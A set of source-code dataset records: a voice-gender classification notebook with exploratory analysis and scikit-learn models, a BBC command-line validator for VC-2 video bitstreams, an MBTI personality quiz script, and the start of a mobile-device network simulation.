Engineering**](#content4)\n\n# [ **5 ) Preparing the Data**](#content5)\n\n# [ **6 ) Modelling**](#content6)\n\n# [ **7 ) Parameter Tuning with GridSearchCV**](#content7)\n\n# In[ ]:\n\n\n\n\n\n# ## 1.1 ) Importing Various Modules\n\n# In[ ]:\n\n\n# Ignore the warnings\nimport warnings\nwarnings.filterwarnings('always')\nwarnings.filterwarnings('ignore')\n\n# data visualisation and manipulation\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib import style\nimport seaborn as sns\nimport missingno as msno\n\n#configure\n# sets matplotlib to inline and displays graphs below the corressponding cell.\nstyle.use('fivethirtyeight')\nsns.set(style='whitegrid',color_codes=True)\n\n#import the necessary modelling algos.\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import LinearSVC\nfrom sklearn.svm import SVC\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn import datasets\nfrom sklearn.naive_bayes import GaussianNB\n\n#model selection\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import KFold\nfrom sklearn.metrics import accuracy_score,precision_score,recall_score,confusion_matrix,roc_curve,roc_auc_score\nfrom sklearn.model_selection import GridSearchCV\n\n#preprocess.\nfrom sklearn.preprocessing import MinMaxScaler,StandardScaler,Imputer,LabelEncoder,OneHotEncoder\n\n\n# ## 1.2 ) Loading the Dataset\n\n# In[ ]:\n\n\ntrain=pd.read_csv(r\"../../../input/primaryobjects_voicegender/voice.csv\")\n\n\n# In[ ]:\n\n\ntrain.head(10)\n\n\n#
    \n# ## 2 ) Exploratory Data Analysis (EDA)\n\n# ## 2.1 ) The Features and the 'Target' variable\n\n# In[ ]:\n\n\ndf=train.copy()\n\n\n# In[ ]:\n\n\ndf.head(10)\n\n\n# In[ ]:\n\n\ndf.shape\n\n\n# In[ ]:\n\n\ndf.index \n\n\n# In[ ]:\n\n\ndf.columns # give a short description of each feature.\n\n\n# **#A short description as on 'Data' tab on kaggle is :**\n\n# #### \n# \n# **meanfreq**: mean frequency (in kHz)\n# \n# **sd**: standard deviation of frequency\n# \n# **median**: median frequency (in kHz)\n# \n# **Q25**: first quantile (in kHz)\n# \n# **Q75**: third quantile (in kHz)\n# \n# **IQR**: interquantile range (in kHz)\n# \n# **skew**: skewness (see note in specprop description)\n# \n# **kurt**: kurtosis (see note in specprop description)\n# \n# **sp.ent**: spectral entropy\n# \n# **sfm**: spectral flatness\n# \n# **mode**: mode frequency\n# \n# **centroid**: frequency centroid (see specprop)\n# \n# **peakf**: peak frequency (frequency with highest energy)\n# \n# **meanfun**: average of fundamental frequency measured across acoustic signal\n# \n# **minfun**: minimum fundamental frequency measured across acoustic signal\n# \n# **maxfun**: maximum fundamental frequency measured across acoustic signal\n# \n# **meandom**: average of dominant frequency measured across acoustic signal\n# \n# **mindom**: minimum of dominant frequency measured across acoustic signal\n# \n# **maxdom**: maximum of dominant frequency measured across acoustic signal\n# \n# **dfrange**: range of dominant frequency measured across acoustic signal\n# \n# **modindx**: modulation index. Calculated as the accumulated absolute difference between adjacent measurements of fundamental frequencies divided by the frequency range\n# \n# **label**: male or female\n\n# #### Note that we have 3168 voice samples and for each of sample 20 different acoustic properties are recorded. Finally the 'label' column is the target variable which we have to predict which is the gender of the person.\n\n# ## 2.2 ) Missing Values Treatment\n\n# In[ ]:\n\n\n# check for null values.\ndf.isnull().any() \n\n\n# In[ ]:\n\n\nmsno.matrix(df) # just to visualize. no missing value.\n\n\n# ## 2.3 ) Univariate Analysis\n\n# In this section I have performed the univariate analysis. Note that since all of the features are 'numeric' the most reasonable way to plot them would either be a 'histogram' or a 'boxplot'.\n# \n# Also note that univariate analysis is useful for outlier detection. Hence besides plotting a boxplot and a histogram for each column or feature, I have written a small utility function which tells the remaining no of observations for each feature if we remove its outliers.\n\n# #### To detect the outliers I have used the standard 1.5 InterQuartileRange (IQR) rule which states that any observation lesser than 'first quartile - 1.5 IQR' or greater than 'third quartile +1.5 IQR' is an outlier.\n\n# In[ ]:\n\n\ndf.describe()\n\n\n# In[ ]:\n\n\ndef calc_limits(feature):\n q1,q3=df[feature].quantile([0.25,0.75])\n iqr=q3-q1\n rang=1.5*iqr\n return(q1-rang,q3+rang)\n\n\n# In[ ]:\n\n\ndef plot(feature):\n fig,axes=plt.subplots(1,2)\n sns.boxplot(data=df,x=feature,ax=axes[0])\n sns.distplot(a=df[feature],ax=axes[1],color='#ff4125')\n fig.set_size_inches(15,5)\n \n lower,upper = calc_limits(feature)\n l=[df[feature] for i in df[feature] if i>lower and i'female' and 1->'male'.\n# \n# 2) Note that the boxpot depicts that the females in genral have higher mean frequencies than their male counterparts and which is a generally accepted fact.\n\n# #### Again similar inferences can be drawn.\n\n# In[ ]:\n\n\nplot_against_target('sd')\n\n\n# In[ ]:\n\n\nplot_against_target('median')\n\n\n# In[ ]:\n\n\nplot_against_target('Q25')\n\n\n# In[ ]:\n\n\nplot_against_target('IQR')\n\n\n# #### Note here that there is a remarkable difference b/w the inter quartile ranges of males and females.This is evident from the strong relation between 'label' and the 'IQR' in the heatmap plotted above.\n\n# In[ ]:\n\n\nplot_against_target('sp.ent')\n\n\n# In[ ]:\n\n\nplot_against_target('sfm')\n\n\n# In[ ]:\n\n\nplot_against_target('meanfun') \n\n\n# #### Again high difference in females and males mean fundamental frequency. This is evident from the heat map which clearly shows the high corelation between meanfun and the 'label'.\n\n# In[ ]:\n\n\n\n\n\n# #### Now we move onto analyzing different features pairwise. Since all the features are continuous the most reasonable way to do this is plotting the scatter plots for each feature pair. I have also distinguished males and feamles on the same plot which makes it a bit easier to compare the variation of features within the two classes.\n\n# In[ ]:\n\n\ng = sns.PairGrid(df[['meanfreq','sd','median','Q25','IQR','sp.ent','sfm','meanfun','label']], hue = \"label\")\ng = g.map(plt.scatter).add_legend()\n\n\n# In[ ]:\n\n\n\n\n\n# \n# ## 3 ) Outlier Treatment\n\n# In this section I have dealt with the outliers. Note that we discovered the potential outliers in the **'univariate analysis' ** section. Now to remove those outliers we can either remove the corressponding data points or impute them with some other statistical quantity like median (robust to outliers) etc..\n\n# #### For now I shall be removing all the observations or data points which are outlier to 'any' feature. Note that this substantially reduces the dataset size.\n\n# In[ ]:\n\n\n# removal of any data point which is an outlier for any fetaure.\nfor col in df.columns:\n lower,upper=calc_limits(col)\n df = df[(df[col] >lower) & (df[col]\n# ## 4 ) Feature Engineering.\n\n# ## 4.1 ) Dropping the features\n\n# I have dropped some columns which according to my analysis proved to be less useful or redundant.\n\n# In[ ]:\n\n\ntemp_df=df.copy()\n\ntemp_df.drop(['skew','kurt','mindom','maxdom'],axis=1,inplace=True) # only one of maxdom and dfrange.\ntemp_df.head(10)\n#df.head(10)\n\n\n# ## 4.2 ) Creating new features\n\n# I have done two new things. Firstly I have made 'meanfreq','median' and 'mode' to comply by the standard relation->\n\n# #### ......................................................................................3*Median=2*Mean +Mode.........................................................................\n\n# #### For this I have adjusted values in the 'median' column as shown below. You can alter values in any of the other column say the 'meanfreq' column.\n\n# In[ ]:\n\n\ntemp_df['meanfreq']=temp_df['meanfreq'].apply(lambda x:x*2)\ntemp_df['median']=temp_df['meanfreq']+temp_df['mode']\ntemp_df['median']=temp_df['median'].apply(lambda x:x/3)\n\n\n# In[ ]:\n\n\ntemp_df.head(10) \n\n\n# In[ ]:\n\n\nsns.boxplot(data=temp_df,y='median',x='label') # seeing the new 'median' against the 'label'.\n\n\n# The second new feature that I have added is a new feature to mesure the 'skewness'. \n\n# #### For this I have used the 'Karl Pearson Coefficent' which is calculated as shown below->\n\n# **** ..........................................................Coefficent = (Mean - Mode )/StandardDeviation......................................................****\n\n# **You can also try some other coefficient also and see how it comapres with the target i.e. the 'label' column.**\n\n# In[ ]:\n\n\ntemp_df['pear_skew']=temp_df['meanfreq']-temp_df['mode']\ntemp_df['pear_skew']=temp_df['pear_skew']/temp_df['sd']\ntemp_df.head(10)\n\n\n# In[ ]:\n\n\nsns.boxplot(data=temp_df,y='pear_skew',x='label') # plotting new 'skewness' against the 'label'.\n\n\n# \n# ## 5 ) Preparing the Data\n\n# ## 5.1 ) Normalizing the Features.\n\n# In[ ]:\n\n\nscaler=StandardScaler()\nscaled_df=scaler.fit_transform(temp_df.drop('label',axis=1))\nX=scaled_df\nY=df['label'].as_matrix()\n\n\n# ## 5.2 ) Splitting into Training and Validation sets.\n\n# In[ ]:\n\n\nx_train,x_test,y_train,y_test=train_test_split(X,Y,test_size=0.20,random_state=42)\n\n\n# In[ ]:\n\n\n\n\n\n# \n# ## 6 ) Modelling\n\n# #### LOGISTIC REGRESSSION\n\n# In[ ]:\n\n\nclf_lr=LogisticRegression()\nclf_lr.fit(x_train,y_train)\npred=clf_lr.predict(x_test)\nprint(accuracy_score(pred,y_test))\n\n\n# #### kNN\n\n# In[ ]:\n\n\nclf_knn=KNeighborsClassifier()\nclf_knn.fit(x_train,y_train)\npred=clf_knn.predict(x_test)\nprint(accuracy_score(pred,y_test))\n\n\n# #### Support Vector Machine (SVM)\n\n# In[ ]:\n\n\nclf_svm=SVC()\nclf_svm.fit(x_train,y_train)\npred=clf_svm.predict(x_test)\nprint(accuracy_score(pred,y_test))\n\n\n# #### DECISION TREE \n\n# In[ ]:\n\n\nclf_dt=DecisionTreeClassifier()\nclf_dt.fit(x_train,y_train)\npred=clf_dt.predict(x_test)\nprint(accuracy_score(pred,y_test))\n\n\n# #### RANDOM FOREST\n\n# In[ ]:\n\n\nclf_rf=RandomForestClassifier()\nclf_rf.fit(x_train,y_train)\npred=clf_rf.predict(x_test)\nprint(accuracy_score(pred,y_test))\n\n\n# #### GRADIENT BOOSTING\n\n# In[ ]:\n\n\nclf_gb=GradientBoostingClassifier()\nclf_gb.fit(x_train,y_train)\npred=clf_gb.predict(x_test)\nprint(accuracy_score(pred,y_test))\n\n\n# #### We can now move onto comparing the results of various modelling algorithms. for tthis I shall combine the results of all models in a data frame and then plot using a barplot .\n\n# In[ ]:\n\n\nmodels=[LogisticRegression(),LinearSVC(),SVC(kernel='rbf'),KNeighborsClassifier(),RandomForestClassifier(),DecisionTreeClassifier(),GradientBoostingClassifier(),GaussianNB()]\nmodel_names=['LogisticRegression','LinearSVM','rbfSVM','KNearestNeighbors','RandomForestClassifier','DecisionTree','GradientBoostingClassifier','GaussianNB']\n\nacc=[]\nd={}\n\nfor model in range(len(models)):\n clf=models[model]\n clf.fit(x_train,y_train)\n pred=clf.predict(x_test)\n acc.append(accuracy_score(pred,y_test))\n \nd={'Modelling Algo':model_names,'Accuracy':acc}\n\n\n# In[ ]:\n\n\nacc_frame=pd.DataFrame(d)\nacc_frame\n\n\n# In[ ]:\n\n\nsns.barplot(y='Modelling Algo',x='Accuracy',data=acc_frame)\n\n\n# In[ ]:\n\n\n\n\n\n# \n# ## 7 ) Parameter Tuning with GridSearchCV\n\n# 1. I have tuned only SVM Similarly other algorithms can be tuned.\n\n# In[ ]:\n\n\nparams_dict={'C':[0.001,0.01,0.1,1,10,100],'gamma':[0.001,0.01,0.1,1,10,100],'kernel':['linear','rbf']}\nclf=GridSearchCV(estimator=SVC(),param_grid=params_dict,scoring='accuracy',cv=10)\nclf.fit(x_train,y_train)\n\n\n# In[ ]:\n\n\nclf.best_score_\n\n\n# In[ ]:\n\n\nclf.best_params_\n\n\n# In[ ]:\n\n\nprint(accuracy_score(clf.predict(x_test),y_test))\n\n\n# In[ ]:\n\n\nprint(precision_score(clf.predict(x_test),y_test))\n\n\n# ### The precision is almost 99.5 % which is quite high.\n\n# ### After tuning SVM gives an amazing accuracy of around 99.1 %. Similarly tuning other algorithms parameters might give even greater accuracy !!!\n\n# In[ ]:\n\n\n\n\n\n# ## THE END!!!\n\n# In[ ]:\n\n\n\n\n\n","repo_name":"Chenguang-Zhu/relancer-artifact","sub_path":"relancer-exp/original_notebooks/primaryobjects_voicegender/a-complete-tutorial-onpredictive-modeling-acc-99.py","file_name":"a-complete-tutorial-onpredictive-modeling-acc-99.py","file_ext":"py","file_size_in_byte":16404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"9995829378","text":"r\"\"\"\n.. _vc2-bitstream-validator:\n\n``vc2-bitstream-validator``\n===========================\n\nA command-line utility for validating VC-2 bitstreams' conformance with the\nVC-2 specification and providing a reference decoding of the pictures within.\n\nUsage\n-----\n\nThis command should be passed a filename containing a candidate VC-2 bitstream.\nFor example, given a valid stream::\n\n $ vc2-bitstream-validator path/to/bitstream.vc2 --output decoded_picture_%d.raw\n No errors found in bitstream. Verify decoded pictures to confirm conformance.\n\nHere the ``--output`` argument specifies the printf-style template for the\ndecoded picture filenames. The decoded pictures are written as raw files (see\n:ref:`file-format`).\n\nIf a conformance error is detected, a detailed explanation of the problem is\ndisplayed::\n\n $ vc2-bitstream-validator invalid.vc2\n Conformance error at bit offset 104\n ===================================\n\n Non-zero previous_parse_offset, 5789784, in the parse info at the start of\n a sequence (10.5.1).\n\n\n Details\n -------\n\n Was this parse info block copied from another stream without the\n previous_parse_offset being updated?\n\n Does this parse info block incorrectly include an offset into an adjacent\n sequence?\n\n\n Suggested bitstream viewer commands\n -----------------------------------\n\n To view the offending part of the bitstream:\n\n vc2-bitstream-viewer invalid.vc2 --offset 104\n\n\n Pseudocode traceback\n --------------------\n\n Most recent call last:\n\n * parse_stream (10.3)\n * parse_sequence (10.4.1)\n * parse_info (10.5.1)\n\n vc2-bitstream-validator: error: non-conformant bitstream (see above)\n\nErrors include an explanation of the conformance problem (along with references\nto the VC-2 standards documents) along with possible causes of the error.\nAdditionally, a sample invocation of :ref:`vc2-bitstream-viewer` is given which\ncan be used to display the contents of the bitstream at the offending position.\nFinally, a stack trace for the VC-2 pseudocode functions involved in parsing\nthe stream at the point of failure is also printed.\n\n\nArguments\n---------\n\nThe complete set of arguments can be listed using ``--help``\n\n.. program-output:: vc2-bitstream-validator --help\n\n\"\"\"\n\nimport os\nimport sys\nimport traceback\n\nfrom argparse import ArgumentParser\n\nfrom textwrap import dedent\n\nfrom vc2_conformance.pseudocode.metadata import make_pseudocode_traceback\n\nfrom vc2_conformance import __version__\n\nfrom vc2_conformance.py2x_compat import quote\n\nfrom vc2_conformance.string_utils import wrap_paragraphs\n\nfrom vc2_conformance.file_format import write\n\nfrom vc2_conformance.pseudocode.state import State\n\nfrom vc2_conformance.decoder import (\n init_io,\n parse_stream,\n ConformanceError,\n tell,\n)\n\nfrom vc2_conformance.bitstream import to_bit_offset\n\nfrom vc2_conformance.py2x_compat import get_terminal_size\n\n\ndef format_pseudocode_traceback(tb):\n \"\"\"\n Given a :py:func:`traceback.extract_tb` generated traceback description,\n return a string describing the current stack of VC-2 pseudocode functions\n being called.\n \"\"\"\n ptb = make_pseudocode_traceback(tb)\n\n return \"\\n\".join(\n \"{}* {}\".format(\" \" * num, pdf.citation) for num, pdf in enumerate(ptb)\n )\n\n\nclass BitstreamValidator(object):\n def __init__(self, filename, show_status, verbose, output_filename):\n \"\"\"\n Parameters\n ==========\n filename : str\n The bitstream filename to read from.\n show_status : bool\n If True, show a status line indicating progress during validation.\n verbose : int\n If >=1, show Python stack traces on failure.\n output_filename : str\n A filename pattern for output bitstream files. Should contain a\n printf-style format string (e.g. \"picture_%d.raw\").\n \"\"\"\n self._filename = filename\n self._show_status = show_status\n self._verbose = verbose\n self._output_filename = output_filename\n\n # The index to use in the filename of the next decoded picture\n self._next_picture_index = 0\n\n # Is the status line currently visible\n self._status_line_visible = False\n\n def run(self):\n try:\n self._file = open(self._filename, \"rb\")\n self._filesize_bytes = os.path.getsize(self._filename)\n except Exception as e:\n # Catch-all exception handler excuse: Catching only file-related\n # exceptions is challenging, particularly in a backward-compatible\n # manner. However, none of the above are known to produce\n # exceptions *except* due to file-related issues.\n self._print_error(str(e))\n return 1\n\n self._state = State(_output_picture_callback=self._output_picture)\n init_io(self._state, self._file)\n\n if self._show_status:\n self._update_status_line(\"Starting bitstream validation...\")\n\n try:\n parse_stream(self._state)\n self._hide_status_line()\n if tell(self._state) == (0, 7):\n sys.stdout.flush()\n sys.stderr.write(\"Warning: 0 bytes read, bitstream is empty.\\n\")\n print(\n \"No errors found in bitstream. Verify decoded pictures to confirm conformance.\"\n )\n return 0\n except ConformanceError as e:\n # Bitstream failed validation\n exc_type, exc_value, exc_tb = sys.exc_info()\n self._hide_status_line()\n self._print_conformance_error(e, traceback.extract_tb(exc_tb))\n self._print_error(\"non-conformant bitstream (see above)\")\n return 2\n except Exception as e:\n # Internal error (shouldn't happen(!))\n self._hide_status_line()\n self._print_error(\n \"internal error in bitstream validator: {}: {} \"\n \"(probably a bug in this program)\".format(\n type(e).__name__,\n str(e),\n )\n )\n return 3\n\n def _output_picture(self, picture, video_parameters, picture_coding_mode):\n filename = self._output_filename % (self._next_picture_index,)\n self._next_picture_index += 1\n\n write(\n picture,\n video_parameters,\n picture_coding_mode,\n filename,\n )\n\n if self._show_status:\n self._update_status_line(\"Decoded picture written to {}\".format(filename))\n\n def _update_status_line(self, message):\n \"\"\"\n Display/update the status line indicating the progress of the decoding\n process.\n \"\"\"\n self._status_line_visible = True\n\n percent = int(\n round((tell(self._state)[0] * 100.0) / (self._filesize_bytes or 1))\n )\n\n line = \"[{:3d}%] {}\".format(percent, message)\n\n # Ensure stdout is fully displayed before doing anything to the status\n # line.\n sys.stdout.flush()\n\n sys.stderr.write(\n (\n \"\\033[2K\" # Clear to end of line\n \"\\033[s\" # Save cursor position\n \"{}\"\n \"\\033[u\" # Restore cursor position\n ).format(line)\n )\n sys.stderr.flush()\n\n def _hide_status_line(self):\n \"\"\"If the status line is visible, hide it.\"\"\"\n if self._status_line_visible:\n self._status_line_visible = False\n\n # Ensure stdout is fully displayed before doing anything to the\n # status line.\n sys.stdout.flush()\n\n sys.stderr.write(\"\\033[2K\") # Clear to end of line\n sys.stderr.flush()\n\n def _print_conformance_error(self, exception, tb):\n \"\"\"\n Display detailed information from a ConformanceError on stdout.\n \"\"\"\n terminal_width = get_terminal_size()[0]\n\n summary, _, details = wrap_paragraphs(exception.explain()).partition(\"\\n\")\n\n offending_offset = exception.offending_offset()\n if offending_offset is None:\n offending_offset = to_bit_offset(*tell(self._state))\n\n title = \"Conformance error at bit offset {}\".format(offending_offset)\n\n bitstream_viewer_hint = (\n dedent(exception.bitstream_viewer_hint())\n .strip()\n .format(\n cmd=\"vc2-bitstream-viewer\",\n file=quote(self._filename),\n offset=offending_offset,\n )\n )\n\n out = \"\"\n\n out += title + \"\\n\"\n out += (\"=\" * len(title)) + \"\\n\"\n out += \"\\n\"\n out += wrap_paragraphs(summary, terminal_width) + \"\\n\"\n out += \"\\n\"\n out += \"\\n\"\n out += \"Details\\n\"\n out += \"-------\\n\"\n out += \"\\n\"\n out += wrap_paragraphs(details, terminal_width) + \"\\n\"\n out += \"\\n\"\n out += \"\\n\"\n out += \"Suggested bitstream viewer commands\\n\"\n out += \"-----------------------------------\\n\"\n out += \"\\n\"\n out += bitstream_viewer_hint + \"\\n\"\n out += \"\\n\"\n out += \"\\n\"\n out += \"Pseudocode traceback\\n\"\n out += \"--------------------\\n\"\n out += \"\\n\"\n out += \"Most recent call last:\\n\"\n out += \"\\n\"\n out += format_pseudocode_traceback(tb) + \"\\n\"\n\n print(out)\n\n def _print_error(self, message):\n \"\"\"\n Print an error message to stderr.\n \"\"\"\n # Avoid interleaving with stdout (and make causality clearer)\n sys.stdout.flush()\n\n # Display the traceback\n if self._verbose >= 1:\n if sys.exc_info()[0] is not None:\n traceback.print_exc()\n\n # Display the message\n prog = os.path.basename(sys.argv[0])\n message = \"{}: error: {}\".format(prog, message)\n sys.stderr.write(\"{}\\n\".format(message))\n\n\ndef parse_args(*args, **kwargs):\n \"\"\"\n Parse a set of command line arguments. Returns a :py:mod:`argparse`\n ``args`` object with the following fields:\n\n * bitstream (str): The filename of the bitstream to read\n * no_status (bool): True if the status line is to be hidden.\n * verbose (int): The verbosity level.\n * output (str): The output picture filename pattern.\n \"\"\"\n parser = ArgumentParser(\n description=\"\"\"\n Validate a bitstream's conformance with the VC-2 specifications.\n \"\"\"\n )\n\n parser.add_argument(\n \"--version\",\n action=\"version\",\n version=\"%(prog)s {}\".format(__version__),\n )\n\n parser.add_argument(\n \"bitstream\",\n help=\"\"\"\n The filename of the bitstream to validate.\n \"\"\",\n )\n\n parser.add_argument(\n \"--no-status\",\n \"--quiet\",\n \"-q\",\n action=\"store_true\",\n default=False,\n help=\"\"\"\n Do not display a status line on stderr while validating the\n bitstream.\n \"\"\",\n )\n\n parser.add_argument(\n \"--verbose\",\n \"-v\",\n action=\"count\",\n default=0,\n help=\"\"\"\n Show full Python stack-traces on failure.\n \"\"\",\n )\n\n parser.add_argument(\n \"--output\",\n \"-o\",\n default=\"picture_%d.raw\",\n help=\"\"\"\n The filename pattern for decoded picture data and metadata. The\n supplied pattern should a 'printf' style template with (e.g.) '%%d'\n where an index will be substituted. The first decoded picture will\n be assigned index '0', the second '1' and so on -- i.e. these\n indices are unrelated to the picture number. The file extension\n supplied will be stripped and two files will be written for each\n decoded picture: a '.raw' planar image file and a '.json' JSON\n metadata file. (Default: %(default)s).\n \"\"\",\n )\n\n args = parser.parse_args(*args, **kwargs)\n\n try:\n args.output % (0,)\n except TypeError as e:\n parser.error(\"--output is not a valid printf template: {}\".format(e))\n\n return args\n\n\ndef main(*args, **kwargs):\n args = parse_args(*args, **kwargs)\n\n validator = BitstreamValidator(\n filename=args.bitstream,\n show_status=not args.no_status,\n verbose=args.verbose,\n output_filename=args.output,\n )\n return validator.run()\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"bbc/vc2_conformance","sub_path":"vc2_conformance/scripts/vc2_bitstream_validator.py","file_name":"vc2_bitstream_validator.py","file_ext":"py","file_size_in_byte":12440,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"76"} +{"seq_id":"28628996696","text":"import itertools\r\nimport math\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom os import system, name\r\nimport re\r\nimport random\r\nimport time\r\n\r\ndef clear(): # Clear the Terminal\r\n _ = system('cls') if name == 'nt' else system('clear')\r\n\r\n \r\nlist_func = [\"Ti\",\"Te\",\"Si\",\"Se\",\"Ni\",\"Ne\",\"Fi\",\"Fe\"]\r\n\r\n\r\ndef main():\r\n response = \"\"\r\n while \"C\" not in response and \"T\" not in response:\r\n response = input(\"Do you want to enter a code OR do you want to do a test ? [C/T]\\n>>>\").upper()\r\n\r\n if response == \"T\": # Test\r\n score = test()\r\n analysis(score)\r\n plot(score)\r\n code = \"\".join(map(lambda l: hex(l).zfill(2)[2:4],score))\r\n print(f\"If you want to see your results again, is here your code:\\n{code}\")\r\n\r\n else:\r\n code = \"\" #640a0f4b32051419\r\n while len(code) != 16:\r\n code = input(\"Enter the code:\\n>>>\")\r\n if len(code)!=16:\r\n print(\"This code isn't valid. Please verify the validity of the code\")\r\n\r\n code = re.findall('..',code) # [\"01\",\"23\",\"45\",\"67\",...]\r\n code = [*map(lambda e: int(e,16),code)] # Transform strings in Hexa to int\r\n analysis(code)\r\n plot(code)\r\n\r\n exit()\r\n\r\n\r\ndef test():\r\n score = [0]*8\r\n lang = \"\"\r\n while \"fr\" not in lang and \"en\" not in lang and \"uk\" not in lang and \"kr\" not in lang and \"jp\" not in lang:\r\n lang = input(\"Do you want the test in English or French or Ukrainian or Korean or Japanese ? [en/fr/uk/kr/jp]\\n>>>\").lower()\r\n if lang == \"fr\":\r\n from FR_questions_mbti import question_about_mbti as CF\r\n elif lang == \"en\":\r\n from ENG_questions_mbti import question_about_mbti as CF \r\n elif lang == \"uk\":\r\n from UK_questions_mbti import question_about_mbti as CF \r\n elif lang == \"jp\":\r\n from JP_questions_mbti import question_about_mbti as CF \r\n else: \r\n from KR_questions_mbti import question_about_mbti as CF\r\n\r\n clear()\r\n questions = [*range(80)]\r\n choi = [[\"Ti\",\"Te\"],[\"Fi\",\"Fe\"],[\"Si\",\"Se\"],[\"Ni\",\"Ne\"]]\r\n while questions != []:\r\n n = random.choice(questions)\r\n asking = True\r\n while asking:\r\n asking = False\r\n print(\"The sentence is:\")\r\n try:\r\n print('\"'+CF[\"TFSN\"[n//20]][str((1+(n%20//2)))][choi[(n)//20][n%2]]+'\"\\n')\r\n except Exception as e:\r\n print(e,n)\r\n time.sleep(100)\r\n \r\n\r\n try:\r\n note = int(input(\"Note this sentence from 0 to 10.\\n>>>\"))\r\n clear()\r\n asking = note < 0 or note > 10\r\n if asking:\r\n print(f\"The number should be between [0;10], not {note}\")\r\n except ValueError:\r\n clear()\r\n print(\"This isn't a number\")\r\n asking = True\r\n \r\n i = 0\r\n if n > 59:\r\n i = 4\r\n if 60 > n > 39:\r\n i = 2\r\n if 40 > n > 19:\r\n i = 6\r\n i+=n%2\r\n score[i] += note\r\n questions.remove(n)\r\n\r\n return score\r\n \r\n \r\n\r\ndef analysis(score):\r\n \"\"\"\r\n \r\n Analysis a score\r\n score is [Ti, Te, Si, Se, Ni, Ne, Fi, Fe]\r\n \r\n \"\"\"\r\n # Creating a New List \r\n sort_score = [score[i]for i in range(8)]\r\n sort_score = sorted(sort_score)\r\n\r\n # Creating a list for Type and score type\r\n list_type = [\r\n [\"IE\"[i // 8] + \"NS\"[(i // 4) % 2] + \"TF\"[(i // 2) % 2] + \"PJ\"[i % 2], 500]\r\n for i in range(16)\r\n ]\r\n\r\n score_func = [[list_func[i],score[i]]for i in range(8)]\r\n\r\n # List of \"Stack\" of function by MBTI Type\r\n list_typofunc = [ [\"Ti\",\"Ne\",\"Si\",\"Fe\"], # INTP\r\n [\"Ni\",\"Te\",\"Fi\",\"Se\"], # INTJ\r\n [\"Fi\",\"Ne\",\"Si\",\"Te\"], # INFP\r\n [\"Ni\",\"Fe\",\"Ti\",\"Se\"], # INFJ\r\n [\"Ti\",\"Se\",\"Ni\",\"Fe\"], # ISTP\r\n [\"Si\",\"Te\",\"Fi\",\"Ne\"], # ISTJ\r\n [\"Fi\",\"Se\",\"Ni\",\"Te\"], # ISFP\r\n [\"Si\",\"Fe\",\"Ti\",\"Ne\"], # ISFJ\r\n [\"Ne\",\"Ti\",\"Fe\",\"Si\"], # ENTP\r\n [\"Te\",\"Ni\",\"Se\",\"Fi\"], # ENTJ\r\n [\"Ne\",\"Fi\",\"Te\",\"Si\"], # ENFP\r\n [\"Fe\",\"Ni\",\"Se\",\"Ti\"], # ENFJ\r\n [\"Se\",\"Ti\",\"Fe\",\"Ni\"], # ESTP\r\n [\"Te\",\"Si\",\"Ne\",\"Fi\"], # ESTJ\r\n [\"Se\",\"Fi\",\"Te\",\"Ni\"], # ESFP\r\n [\"Fe\",\"Si\",\"Ne\",\"Ti\"] # ESFJ\r\n ]\r\n\r\n # Coefficients of importance\r\n coef = [2, 1.5, 1.25, 1]\r\n # Calculates score for every MBTI type due to it's \"proximity\" with the \"i-th\" function\r\n for i, j in itertools.product(range(16), range(4)):\r\n # sum(score_func[k][1] for k in range(8) if list_typofunc[i][j] == score_func[k][0]) <=> The score of \"j-th\" function of the \"i-th\" MBTI type\r\n list_type[i][1] -= abs(sort_score[7-j] - sum(score_func[k][1] for k in range(8) if list_typofunc[i][j] == score_func[k][0]))*coef[j]\r\n\r\n\r\n # Sorting MBTI type by there score\r\n final_score = sorted(list_type, key = lambda x: x[1])[::-1]\r\n\r\n # Doing the Sum of exponentiel for probability\r\n sumExp = sum( math.exp(final_score[i][1]/10) for i in range(16))\r\n\r\n # Probability list\r\n probability = [str(round(float(100 * math.exp(final_score[i][1]/10)/sumExp),2))+\"%\" for i in range(16)]\r\n\r\n # Final Print\r\n print(\"The Scores are:\\n\\t- \"+\"\\n\\t- \".join(final_score[i][0]+f\" : {final_score[i][1]}pts <=> Probability of : {probability[i]}\" for i in range(16)))\r\n\r\n\r\ndef plot(score):\r\n \"\"\"\r\n plot the score\r\n \"\"\"\r\n ################################################################################################################\r\n # P L O T #\r\n ################################################################################################################\r\n x = np.array(list_func) #\r\n y = np.array(score) #\r\n #\r\n plt.bar(x,y, color=['#3480eb','#5b97eb','#40b361','#59c979', '#f2d00c','#ffe657', '#c41837','#c9324e']) #\r\n plt.show() #\r\n ################################################################################################################\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"aderepas/MBTI_Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6715,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"69800767285","text":"import random\nfrom constants import *\nfrom node import Node\nimport numpy as np\n\n'''\n\n\tEach device has a start and stop point\n\t\tthey're \"powered on\" at point A (random location on edge of map)\n\t\tthey move to point B (random location on a different edge of map)\n\t\t\tavoiding other nodes along the way\n\t\t\t\tby making node velocity very small, if a node is surrounded by a bunch of nodes and its\n\t\t\t\tvector sum pushes it into a node it will be closer the next time but not NEAR at all\n\t\t\t\tcolliding and now that its closer its new vector sum will push it away from the node\n\t\t\t\tits getting closer to colliding with, and the nodes will never collide with each other\n\t\tthen they \"shut down\" at point B\n\n\t\tThis causes the networks the devices form to:\n\t\t\tgrow\n\t\t\tshrink\n\t\t\tsplit\n\t\t\tmerge\n\t\twhich makes the simulation much more realistic\n\t'''\n\n\nclass Device(object):\n\n\tdef __init__(self, devices, t, ping_periodically):\n\n\t\tself.src, self.dst = self.set_source_and_destination(devices)\n\t\tself.vel = self.set_velocity()\n\t\t# print('src = (%.4f, %.4f)' % (self.src[0], self.src[1]))\n\t\tself.n = Node(self.src[0], self.src[1], t, ping_periodically, grid=False)\n\t\tself.num = 